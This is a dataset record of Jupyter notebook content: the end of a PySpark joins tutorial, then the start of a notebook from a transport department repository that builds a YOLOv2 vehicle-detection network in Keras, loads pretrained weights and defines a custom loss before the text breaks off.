"# Outer Join\njoinType = \"outer\"\nperson.join(graduateProgram, joinExpression, joinType).show()",
"+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| id| name|graduate_program| spark_status| id| degree| department| school|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| 0| Bill Chambers| 0| [100]| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Matei Zaharia| 1|[500, 250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n| 2|Michael Armbrust| 1| [250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n|null| null| null| null| 2|Masters| EECS|UC Berkeley|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n\n"
],
[
"# Left Outer\njoinType = \"left_outer\"\ngraduateProgram.join(person, joinExpression, joinType).show()",
"+---+-------+--------------------+-----------+----+----------------+----------------+---------------+\n| id| degree| department| school| id| name|graduate_program| spark_status|\n+---+-------+--------------------+-----------+----+----------------+----------------+---------------+\n| 0|Masters|School of Informa...|UC Berkeley| 0| Bill Chambers| 0| [100]|\n| 1| Ph.D.| EECS|UC Berkeley| 1| Matei Zaharia| 1|[500, 250, 100]|\n| 1| Ph.D.| EECS|UC Berkeley| 2|Michael Armbrust| 1| [250, 100]|\n| 2|Masters| EECS|UC Berkeley|null| null| null| null|\n+---+-------+--------------------+-----------+----+----------------+----------------+---------------+\n\n"
],
[
"# Right outer\njoinType = \"right_outer\"\nperson.join(graduateProgram, joinExpression, joinType).show()",
"+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| id| name|graduate_program| spark_status| id| degree| department| school|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| 0| Bill Chambers| 0| [100]| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Matei Zaharia| 1|[500, 250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n| 2|Michael Armbrust| 1| [250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n|null| null| null| null| 2|Masters| EECS|UC Berkeley|\n+----+----------------+----------------+---------------+---+-------+--------------------+-----------+\n\n"
],
[
"# Left semi\njoinType = \"left_semi\"\ngraduateProgram.join(person, joinExpression, joinType).show()",
"+---+-------+--------------------+-----------+\n| id| degree| department| school|\n+---+-------+--------------------+-----------+\n| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Ph.D.| EECS|UC Berkeley|\n+---+-------+--------------------+-----------+\n\n"
],
[
"# Left ani\njoinType = \"left_anti\"\ngraduateProgram.join(person, joinExpression, joinType).show()",
"+---+-------+----------+-----------+\n| id| degree|department| school|\n+---+-------+----------+-----------+\n| 2|Masters| EECS|UC Berkeley|\n+---+-------+----------+-----------+\n\n"
]
],
[
[
"> Note: Its also possible to run the following joins in Spark\n * Natural\n * Cartesion/Cross",
"_____no_output_____"
]
],
[
[
"spark.stop()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2adf370c5ca1250b69d36fbce30d8d5613b7eb | 65,473 | ipynb | Jupyter Notebook | Yolo Step-by-Step.ipynb | departmentfortransport/dftlab-yolo-vehiclecounting | 703b79953aa606a79e0659f99256cd613dff8a57 | [
"MIT"
] | 5 | 2018-06-11T14:07:39.000Z | 2019-10-22T17:42:01.000Z | Yolo Step-by-Step.ipynb | department-for-transport/dftlab-yolo-vehiclecounting | 703b79953aa606a79e0659f99256cd613dff8a57 | [
"MIT"
] | 1 | 2019-02-25T12:31:08.000Z | 2019-11-06T08:09:15.000Z | Yolo Step-by-Step.ipynb | department-for-transport/dftlab-yolo-vehiclecounting | 703b79953aa606a79e0659f99256cd613dff8a57 | [
"MIT"
] | null | null | null | 53.360228 | 1,317 | 0.581492 | [
[
[
"**Outline of Steps**\n + Initialization\n + Download COCO detection data from http://cocodataset.org/#download\n + http://images.cocodataset.org/zips/train2014.zip <= train images\n + http://images.cocodataset.org/zips/val2014.zip <= validation images\n + http://images.cocodataset.org/annotations/annotations_trainval2014.zip <= train and validation annotations\n + Run this script to convert annotations in COCO format to VOC format\n + https://gist.github.com/chicham/6ed3842d0d2014987186#file-coco2pascal-py\n + Download pre-trained weights from https://pjreddie.com/darknet/yolo/\n + https://pjreddie.com/media/files/yolo.weights\n + Specify the directory of train annotations (train_annot_folder) and train images (train_image_folder)\n + Specify the directory of validation annotations (valid_annot_folder) and validation images (valid_image_folder)\n + Specity the path of pre-trained weights by setting variable *wt_path*\n + Construct equivalent network in Keras\n + Network arch from https://github.com/pjreddie/darknet/blob/master/cfg/yolo-voc.cfg\n + Load the pretrained weights\n + Perform training \n + Perform detection on an image with newly trained weights\n + Perform detection on an video with newly trained weights",
"_____no_output_____"
],
[
"# Initialization",
"_____no_output_____"
]
],
[
[
"from keras.models import Sequential, Model\nfrom keras.layers import Reshape, Activation, Conv2D, Input, MaxPooling2D, BatchNormalization, Flatten, Dense, Lambda\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.layers.merge import concatenate\nimport matplotlib.pyplot as plt\nimport keras.backend as K\nimport tensorflow as tf\nimport imgaug as ia\nfrom tqdm import tqdm\nfrom imgaug import augmenters as iaa\nimport numpy as np\nimport pickle\nimport os, cv2\nfrom preprocessing import parse_annotation, BatchGenerator\nfrom utils import WeightReader, decode_netout, draw_boxes\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n%matplotlib inline",
"/home/zachary_arundel/freightkeras/env/lib/python3.5/site-packages/h5py/__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n from ._conv import register_converters as _register_converters\nUsing TensorFlow backend.\n"
],
[
"LABELS = [\"car\", \"truck\", \"pickup\", \"tractor\", \"camping car\", \"boat\",\"motorcycle\", \"van\", \"other\", \"plane\"] \n\nIMAGE_H, IMAGE_W = 416, 416\nGRID_H, GRID_W = 13 , 13\nBOX = 5\nCLASS = len(LABELS)\nCLASS_WEIGHTS = np.ones(CLASS, dtype='float32')\nOBJ_THRESHOLD = 0.3#0.5\nNMS_THRESHOLD = 0.3#0.45\nANCHORS = [0.88,1.69, 1.18,0.7, 1.65,1.77,1.77,0.9, 3.75, 3.57],\n\nNO_OBJECT_SCALE = 1.0\nOBJECT_SCALE = 5.0\nCOORD_SCALE = 1.0\nCLASS_SCALE = 1.0\n\nBATCH_SIZE = 16\nWARM_UP_BATCHES = 0\nTRUE_BOX_BUFFER = 50",
"_____no_output_____"
],
[
"wt_path = 'full_yolo_backend.h5' \ntrain_image_folder = 'train_image_folder/'\ntrain_annot_folder = 'train_annot_folder/'\nvalid_image_folder = 'valid_image_folder/'\nvalid_annot_folder = 'valid_annot_folder/'",
"_____no_output_____"
]
],
[
[
"# Construct the network",
"_____no_output_____"
]
],
[
[
"# the function to implement the orgnization layer (thanks to github.com/allanzelener/YAD2K)\ndef space_to_depth_x2(x):\n return tf.space_to_depth(x, block_size=2)",
"_____no_output_____"
],
[
"input_image = Input(shape=(IMAGE_H, IMAGE_W, 3))\ntrue_boxes = Input(shape=(1, 1, 1, TRUE_BOX_BUFFER , 4))\n\n# Layer 1\nx = Conv2D(32, (3,3), strides=(1,1), padding='same', name='conv_1', use_bias=False)(input_image)\nx = BatchNormalization(name='norm_1')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 2\nx = Conv2D(64, (3,3), strides=(1,1), padding='same', name='conv_2', use_bias=False)(x)\nx = BatchNormalization(name='norm_2')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 3\nx = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_3', use_bias=False)(x)\nx = BatchNormalization(name='norm_3')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 4\nx = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_4', use_bias=False)(x)\nx = BatchNormalization(name='norm_4')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 5\nx = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_5', use_bias=False)(x)\nx = BatchNormalization(name='norm_5')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 6\nx = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_6', use_bias=False)(x)\nx = BatchNormalization(name='norm_6')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 7\nx = Conv2D(128, (1,1), strides=(1,1), padding='same', name='conv_7', use_bias=False)(x)\nx = BatchNormalization(name='norm_7')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 8\nx = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_8', use_bias=False)(x)\nx = BatchNormalization(name='norm_8')(x)\nx = LeakyReLU(alpha=0.1)(x)\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 9\nx = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_9', use_bias=False)(x)\nx = BatchNormalization(name='norm_9')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 10\nx = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_10', use_bias=False)(x)\nx = BatchNormalization(name='norm_10')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 11\nx = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_11', use_bias=False)(x)\nx = BatchNormalization(name='norm_11')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 12\nx = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_12', use_bias=False)(x)\nx = BatchNormalization(name='norm_12')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 13\nx = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_13', use_bias=False)(x)\nx = BatchNormalization(name='norm_13')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\nskip_connection = x\n\nx = MaxPooling2D(pool_size=(2, 2))(x)\n\n# Layer 14\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_14', use_bias=False)(x)\nx = BatchNormalization(name='norm_14')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 15\nx = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_15', use_bias=False)(x)\nx = BatchNormalization(name='norm_15')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 16\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_16', use_bias=False)(x)\nx = BatchNormalization(name='norm_16')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 17\nx = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_17', use_bias=False)(x)\nx = BatchNormalization(name='norm_17')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 18\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_18', use_bias=False)(x)\nx = BatchNormalization(name='norm_18')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 19\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_19', use_bias=False)(x)\nx = BatchNormalization(name='norm_19')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 20\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_20', use_bias=False)(x)\nx = BatchNormalization(name='norm_20')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 21\nskip_connection = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_21', use_bias=False)(skip_connection)\nskip_connection = BatchNormalization(name='norm_21')(skip_connection)\nskip_connection = LeakyReLU(alpha=0.1)(skip_connection)\nskip_connection = Lambda(space_to_depth_x2)(skip_connection)\n\nx = concatenate([skip_connection, x])\n\n# Layer 22\nx = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_22', use_bias=False)(x)\nx = BatchNormalization(name='norm_22')(x)\nx = LeakyReLU(alpha=0.1)(x)\n\n# Layer 23\nx = Conv2D(BOX * (4 + 1 + CLASS), (1,1), strides=(1,1), padding='same', name='conv_23')(x)\noutput = Reshape((GRID_H, GRID_W, BOX, 4 + 1 + CLASS))(x)\n\n# small hack to allow true_boxes to be registered when Keras build the model \n# for more information: https://github.com/fchollet/keras/issues/2790\noutput = Lambda(lambda args: args[0])([output, true_boxes])\n\nmodel = Model([input_image, true_boxes], output)",
"_____no_output_____"
],
[
"model.summary()",
"____________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n====================================================================================================\ninput_1 (InputLayer) (None, 416, 416, 3) 0 \n____________________________________________________________________________________________________\nconv_1 (Conv2D) (None, 416, 416, 32) 864 input_1[0][0] \n____________________________________________________________________________________________________\nnorm_1 (BatchNormalization) (None, 416, 416, 32) 128 conv_1[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_1 (LeakyReLU) (None, 416, 416, 32) 0 norm_1[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_1 (MaxPooling2D) (None, 208, 208, 32) 0 leaky_re_lu_1[0][0] \n____________________________________________________________________________________________________\nconv_2 (Conv2D) (None, 208, 208, 64) 18432 max_pooling2d_1[0][0] \n____________________________________________________________________________________________________\nnorm_2 (BatchNormalization) (None, 208, 208, 64) 256 conv_2[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_2 (LeakyReLU) (None, 208, 208, 64) 0 norm_2[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 104, 104, 64) 0 leaky_re_lu_2[0][0] \n____________________________________________________________________________________________________\nconv_3 (Conv2D) (None, 104, 104, 128) 73728 max_pooling2d_2[0][0] \n____________________________________________________________________________________________________\nnorm_3 (BatchNormalization) (None, 104, 104, 128) 512 conv_3[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_3 (LeakyReLU) (None, 104, 104, 128) 0 norm_3[0][0] \n____________________________________________________________________________________________________\nconv_4 (Conv2D) (None, 104, 104, 64) 8192 leaky_re_lu_3[0][0] \n____________________________________________________________________________________________________\nnorm_4 (BatchNormalization) (None, 104, 104, 64) 256 conv_4[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_4 (LeakyReLU) (None, 104, 104, 64) 0 norm_4[0][0] \n____________________________________________________________________________________________________\nconv_5 (Conv2D) (None, 104, 104, 128) 73728 leaky_re_lu_4[0][0] \n____________________________________________________________________________________________________\nnorm_5 (BatchNormalization) (None, 104, 104, 128) 512 conv_5[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_5 (LeakyReLU) (None, 104, 104, 128) 0 norm_5[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_3 (MaxPooling2D) (None, 52, 52, 128) 0 leaky_re_lu_5[0][0] \n____________________________________________________________________________________________________\nconv_6 (Conv2D) (None, 52, 52, 256) 294912 max_pooling2d_3[0][0] \n____________________________________________________________________________________________________\nnorm_6 (BatchNormalization) (None, 52, 52, 256) 1024 conv_6[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_6 (LeakyReLU) (None, 52, 52, 256) 0 norm_6[0][0] \n____________________________________________________________________________________________________\nconv_7 (Conv2D) (None, 52, 52, 128) 32768 leaky_re_lu_6[0][0] \n____________________________________________________________________________________________________\nnorm_7 (BatchNormalization) (None, 52, 52, 128) 512 conv_7[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_7 (LeakyReLU) (None, 52, 52, 128) 0 norm_7[0][0] \n____________________________________________________________________________________________________\nconv_8 (Conv2D) (None, 52, 52, 256) 294912 leaky_re_lu_7[0][0] \n____________________________________________________________________________________________________\nnorm_8 (BatchNormalization) (None, 52, 52, 256) 1024 conv_8[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_8 (LeakyReLU) (None, 52, 52, 256) 0 norm_8[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_4 (MaxPooling2D) (None, 26, 26, 256) 0 leaky_re_lu_8[0][0] \n____________________________________________________________________________________________________\nconv_9 (Conv2D) (None, 26, 26, 512) 1179648 max_pooling2d_4[0][0] \n____________________________________________________________________________________________________\nnorm_9 (BatchNormalization) (None, 26, 26, 512) 2048 conv_9[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_9 (LeakyReLU) (None, 26, 26, 512) 0 norm_9[0][0] \n____________________________________________________________________________________________________\nconv_10 (Conv2D) (None, 26, 26, 256) 131072 leaky_re_lu_9[0][0] \n____________________________________________________________________________________________________\nnorm_10 (BatchNormalization) (None, 26, 26, 256) 1024 conv_10[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_10 (LeakyReLU) (None, 26, 26, 256) 0 norm_10[0][0] \n____________________________________________________________________________________________________\nconv_11 (Conv2D) (None, 26, 26, 512) 1179648 leaky_re_lu_10[0][0] \n____________________________________________________________________________________________________\nnorm_11 (BatchNormalization) (None, 26, 26, 512) 2048 conv_11[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_11 (LeakyReLU) (None, 26, 26, 512) 0 norm_11[0][0] \n____________________________________________________________________________________________________\nconv_12 (Conv2D) (None, 26, 26, 256) 131072 leaky_re_lu_11[0][0] \n____________________________________________________________________________________________________\nnorm_12 (BatchNormalization) (None, 26, 26, 256) 1024 conv_12[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_12 (LeakyReLU) (None, 26, 26, 256) 0 norm_12[0][0] \n____________________________________________________________________________________________________\nconv_13 (Conv2D) (None, 26, 26, 512) 1179648 leaky_re_lu_12[0][0] \n____________________________________________________________________________________________________\nnorm_13 (BatchNormalization) (None, 26, 26, 512) 2048 conv_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_13 (LeakyReLU) (None, 26, 26, 512) 0 norm_13[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_5 (MaxPooling2D) (None, 13, 13, 512) 0 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nconv_14 (Conv2D) (None, 13, 13, 1024) 4718592 max_pooling2d_5[0][0] \n____________________________________________________________________________________________________\nnorm_14 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_14[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_14 (LeakyReLU) (None, 13, 13, 1024) 0 norm_14[0][0] \n____________________________________________________________________________________________________\nconv_15 (Conv2D) (None, 13, 13, 512) 524288 leaky_re_lu_14[0][0] \n____________________________________________________________________________________________________\nnorm_15 (BatchNormalization) (None, 13, 13, 512) 2048 conv_15[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_15 (LeakyReLU) (None, 13, 13, 512) 0 norm_15[0][0] \n____________________________________________________________________________________________________\nconv_16 (Conv2D) (None, 13, 13, 1024) 4718592 leaky_re_lu_15[0][0] \n____________________________________________________________________________________________________\nnorm_16 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_16[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_16 (LeakyReLU) (None, 13, 13, 1024) 0 norm_16[0][0] \n____________________________________________________________________________________________________\nconv_17 (Conv2D) (None, 13, 13, 512) 524288 leaky_re_lu_16[0][0] \n____________________________________________________________________________________________________\nnorm_17 (BatchNormalization) (None, 13, 13, 512) 2048 conv_17[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_17 (LeakyReLU) (None, 13, 13, 512) 0 norm_17[0][0] \n____________________________________________________________________________________________________\nconv_18 (Conv2D) (None, 13, 13, 1024) 4718592 leaky_re_lu_17[0][0] \n____________________________________________________________________________________________________\nnorm_18 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_18[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_18 (LeakyReLU) (None, 13, 13, 1024) 0 norm_18[0][0] \n____________________________________________________________________________________________________\nconv_19 (Conv2D) (None, 13, 13, 1024) 9437184 leaky_re_lu_18[0][0] \n____________________________________________________________________________________________________\nnorm_19 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_19[0][0] \n____________________________________________________________________________________________________\nconv_21 (Conv2D) (None, 26, 26, 64) 32768 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_19 (LeakyReLU) (None, 13, 13, 1024) 0 norm_19[0][0] \n____________________________________________________________________________________________________\nnorm_21 (BatchNormalization) (None, 26, 26, 64) 256 conv_21[0][0] \n____________________________________________________________________________________________________\nconv_20 (Conv2D) (None, 13, 13, 1024) 9437184 leaky_re_lu_19[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_21 (LeakyReLU) (None, 26, 26, 64) 0 norm_21[0][0] \n____________________________________________________________________________________________________\nnorm_20 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_20[0][0] \n____________________________________________________________________________________________________\nlambda_1 (Lambda) (None, 13, 13, 256) 0 leaky_re_lu_21[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_20 (LeakyReLU) (None, 13, 13, 1024) 0 norm_20[0][0] \n____________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 13, 13, 1280) 0 lambda_1[0][0] \n leaky_re_lu_20[0][0] \n____________________________________________________________________________________________________\nconv_22 (Conv2D) (None, 13, 13, 1024) 11796480 concatenate_1[0][0] \n____________________________________________________________________________________________________\nnorm_22 (BatchNormalization) (None, 13, 13, 1024) 4096 conv_22[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_22 (LeakyReLU) (None, 13, 13, 1024) 0 norm_22[0][0] \n____________________________________________________________________________________________________\nconv_23 (Conv2D) (None, 13, 13, 30) 30750 leaky_re_lu_22[0][0] \n____________________________________________________________________________________________________\nreshape_1 (Reshape) (None, 13, 13, 5, 6) 0 conv_23[0][0] \n____________________________________________________________________________________________________\ninput_2 (InputLayer) (None, 1, 1, 1, 50, 4 0 \n____________________________________________________________________________________________________\nlambda_2 (Lambda) (None, 13, 13, 5, 6) 0 reshape_1[0][0] \n input_2[0][0] \n====================================================================================================\nTotal params: 50,578,686\nTrainable params: 50,558,014\nNon-trainable params: 20,672\n____________________________________________________________________________________________________\n"
]
],
[
[
"# Load pretrained weights",
"_____no_output_____"
],
[
"**Load the weights originally provided by YOLO**",
"_____no_output_____"
]
],
[
[
"weight_reader = WeightReader(wt_path)",
"_____no_output_____"
],
[
"weight_reader.reset()\nnb_conv = 23\n\nfor i in range(1, nb_conv+1):\n conv_layer = model.get_layer('conv_' + str(i))\n \n if i < nb_conv:\n norm_layer = model.get_layer('norm_' + str(i))\n \n size = np.prod(norm_layer.get_weights()[0].shape)\n\n beta = weight_reader.read_bytes(size)\n gamma = weight_reader.read_bytes(size)\n mean = weight_reader.read_bytes(size)\n var = weight_reader.read_bytes(size)\n\n weights = norm_layer.set_weights([gamma, beta, mean, var]) \n \n if len(conv_layer.get_weights()) > 1:\n bias = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[1].shape))\n kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n kernel = kernel.transpose([2,3,1,0])\n conv_layer.set_weights([kernel, bias])\n else:\n kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n kernel = kernel.transpose([2,3,1,0])\n conv_layer.set_weights([kernel])",
"_____no_output_____"
]
],
[
[
"**Randomize weights of the last layer**",
"_____no_output_____"
]
],
[
[
"layer = model.layers[-4] # the last convolutional layer\nweights = layer.get_weights()\n\nnew_kernel = np.random.normal(size=weights[0].shape)/(GRID_H*GRID_W)\nnew_bias = np.random.normal(size=weights[1].shape)/(GRID_H*GRID_W)\n\nlayer.set_weights([new_kernel, new_bias])",
"_____no_output_____"
]
],
[
[
"# Perform training",
"_____no_output_____"
],
[
"**Loss function**",
"_____no_output_____"
],
[
"$$\\begin{multline}\n\\lambda_\\textbf{coord}\n\\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{obj}}\n \\left[\n \\left(\n x_i - \\hat{x}_i\n \\right)^2 +\n \\left(\n y_i - \\hat{y}_i\n \\right)^2\n \\right]\n\\\\\n+ \\lambda_\\textbf{coord} \n\\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{obj}}\n \\left[\n \\left(\n \\sqrt{w_i} - \\sqrt{\\hat{w}_i}\n \\right)^2 +\n \\left(\n \\sqrt{h_i} - \\sqrt{\\hat{h}_i}\n \\right)^2\n \\right]\n\\\\\n+ \\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{obj}}\n \\left(\n C_i - \\hat{C}_i\n \\right)^2\n\\\\\n+ \\lambda_\\textrm{noobj}\n\\sum_{i = 0}^{S^2}\n \\sum_{j = 0}^{B}\n L_{ij}^{\\text{noobj}}\n \\left(\n C_i - \\hat{C}_i\n \\right)^2\n\\\\\n+ \\sum_{i = 0}^{S^2}\nL_i^{\\text{obj}}\n \\sum_{c \\in \\textrm{classes}}\n \\left(\n p_i(c) - \\hat{p}_i(c)\n \\right)^2\n\\end{multline}$$",
"_____no_output_____"
]
],
[
[
"def custom_loss(y_true, y_pred):\n mask_shape = tf.shape(y_true)[:4]\n \n cell_x = tf.to_float(tf.reshape(tf.tile(tf.range(GRID_W), [GRID_H]), (1, GRID_H, GRID_W, 1, 1)))\n cell_y = tf.transpose(cell_x, (0,2,1,3,4))\n\n cell_grid = tf.tile(tf.concat([cell_x,cell_y], -1), [BATCH_SIZE, 1, 1, 5, 1])\n \n coord_mask = tf.zeros(mask_shape)\n conf_mask = tf.zeros(mask_shape)\n class_mask = tf.zeros(mask_shape)\n \n seen = tf.Variable(0.)\n total_recall = tf.Variable(0.)\n \n \"\"\"\n Adjust prediction\n \"\"\"\n ### adjust x and y \n pred_box_xy = tf.sigmoid(y_pred[..., :2]) + cell_grid\n \n ### adjust w and h\n pred_box_wh = tf.exp(y_pred[..., 2:4]) * np.reshape(ANCHORS, [1,1,1,BOX,2])\n \n ### adjust confidence\n pred_box_conf = tf.sigmoid(y_pred[..., 4])\n \n ### adjust class probabilities\n pred_box_class = y_pred[..., 5:]\n \n \"\"\"\n Adjust ground truth\n \"\"\"\n ### adjust x and y\n true_box_xy = y_true[..., 0:2] # relative position to the containing cell\n \n ### adjust w and h\n true_box_wh = y_true[..., 2:4] # number of cells accross, horizontally and vertically\n \n ### adjust confidence\n true_wh_half = true_box_wh / 2.\n true_mins = true_box_xy - true_wh_half\n true_maxes = true_box_xy + true_wh_half\n \n pred_wh_half = pred_box_wh / 2.\n pred_mins = pred_box_xy - pred_wh_half\n pred_maxes = pred_box_xy + pred_wh_half \n \n intersect_mins = tf.maximum(pred_mins, true_mins)\n intersect_maxes = tf.minimum(pred_maxes, true_maxes)\n intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)\n intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]\n \n true_areas = true_box_wh[..., 0] * true_box_wh[..., 1]\n pred_areas = pred_box_wh[..., 0] * pred_box_wh[..., 1]\n\n union_areas = pred_areas + true_areas - intersect_areas\n iou_scores = tf.truediv(intersect_areas, union_areas)\n \n true_box_conf = iou_scores * y_true[..., 4]\n \n ### adjust class probabilities\n true_box_class = tf.argmax(y_true[..., 5:], -1)\n \n \"\"\"\n Determine the masks\n \"\"\"\n ### coordinate mask: simply the position of the ground truth boxes (the predictors)\n coord_mask = tf.expand_dims(y_true[..., 4], axis=-1) * COORD_SCALE\n \n ### confidence mask: penelize predictors + penalize boxes with low IOU\n # penalize the confidence of the boxes, which have IOU with some ground truth box < 0.6\n true_xy = true_boxes[..., 0:2]\n true_wh = true_boxes[..., 2:4]\n \n true_wh_half = true_wh / 2.\n true_mins = true_xy - true_wh_half\n true_maxes = true_xy + true_wh_half\n \n pred_xy = tf.expand_dims(pred_box_xy, 4)\n pred_wh = tf.expand_dims(pred_box_wh, 4)\n \n pred_wh_half = pred_wh / 2.\n pred_mins = pred_xy - pred_wh_half\n pred_maxes = pred_xy + pred_wh_half \n \n intersect_mins = tf.maximum(pred_mins, true_mins)\n intersect_maxes = tf.minimum(pred_maxes, true_maxes)\n intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)\n intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]\n \n true_areas = true_wh[..., 0] * true_wh[..., 1]\n pred_areas = pred_wh[..., 0] * pred_wh[..., 1]\n\n union_areas = pred_areas + true_areas - intersect_areas\n iou_scores = tf.truediv(intersect_areas, union_areas)\n\n best_ious = tf.reduce_max(iou_scores, axis=4)\n conf_mask = conf_mask + tf.to_float(best_ious < 0.6) * (1 - y_true[..., 4]) * NO_OBJECT_SCALE\n \n # penalize the confidence of the boxes, which are reponsible for corresponding ground truth box\n conf_mask = conf_mask + y_true[..., 4] * OBJECT_SCALE\n \n ### class mask: simply the position of the ground truth boxes (the predictors)\n class_mask = y_true[..., 4] * tf.gather(CLASS_WEIGHTS, true_box_class) * CLASS_SCALE \n \n \"\"\"\n Warm-up training\n \"\"\"\n no_boxes_mask = tf.to_float(coord_mask < COORD_SCALE/2.)\n seen = tf.assign_add(seen, 1.)\n \n true_box_xy, true_box_wh, coord_mask = tf.cond(tf.less(seen, WARM_UP_BATCHES), \n lambda: [true_box_xy + (0.5 + cell_grid) * no_boxes_mask, \n true_box_wh + tf.ones_like(true_box_wh) * np.reshape(ANCHORS, [1,1,1,BOX,2]) * no_boxes_mask, \n tf.ones_like(coord_mask)],\n lambda: [true_box_xy, \n true_box_wh,\n 